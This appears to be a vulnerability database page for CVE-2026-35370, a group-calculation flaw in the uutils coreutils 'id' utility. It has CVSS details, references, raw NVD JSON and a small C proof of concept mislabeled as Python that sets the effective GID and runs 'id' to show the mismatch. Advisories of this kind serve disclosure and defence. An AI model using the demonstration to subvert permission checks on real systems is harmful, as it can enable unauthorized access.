CVE-2026-35370

Description

The id utility in uutils coreutils miscalculates the groups= section of its output. The implementation uses a user's real GID instead of their effective GID to compute the group list, leading to potentially divergent output compared to GNU coreutils. Because many scripts and automated processes rely on the output of id to make security-critical access-control or permission decisions, this discrepancy can lead to unauthorized access or security misconfigurations.

CVSS Details

CVSS Score

4.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:* - VULNERABLE

uutils coreutils (修复前版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

/*
 * PoC for CVE-2026-35370
 * This C program demonstrates the discrepancy between Real GID and Effective GID.
 * Compile with: gcc poc.c -o poc
 * Run with: ./poc
 */

int main() {
    // Assume we want to test membership in group 1001 (effective GID)
    gid_t target_egid = 1001;
    
    if (setegid(target_egid) != 0) {
        perror("Failed to set Effective GID");
        return 1;
    }

    printf("[+] Process Info:\n");
    printf("    Real GID: %d\n", getgid());
    printf("    Effective GID: %d\n", getegid());

    printf("\n[!] Running 'id' command (vulnerable uutils version):\n");
    // The vulnerable 'id' will calculate groups based on Real GID (getgid())
    // instead of Effective GID (getegid()), potentially missing 'target_egid'.
    system("id");

    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35370
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35370
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35370/
[4] VulDB https://vuldb.com/cve/CVE-2026-35370
[5] https://github.com/uutils/coreutils/issues/10006
[6] https://github.com/uutils/coreutils/issues/10006

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35370", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:40.833", "lastModified": "2026-05-04T20:02:44.330", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The id utility in uutils coreutils miscalculates the groups= section of its output. The implementation uses a user's real GID instead of their effective GID to compute the group list, leading to potentially divergent output compared to GNU coreutils. Because many scripts and automated processes rely on the output of id to make security-critical access-control or permission decisions, this discrepancy can lead to unauthorized access or security misconfigurations."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:*", "matchCriteriaId": "4A9AF9E4-E17C-48AD-8051-B49998618839"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/issues/10006", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/uutils/coreutils/issues/10006", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking"]}]}}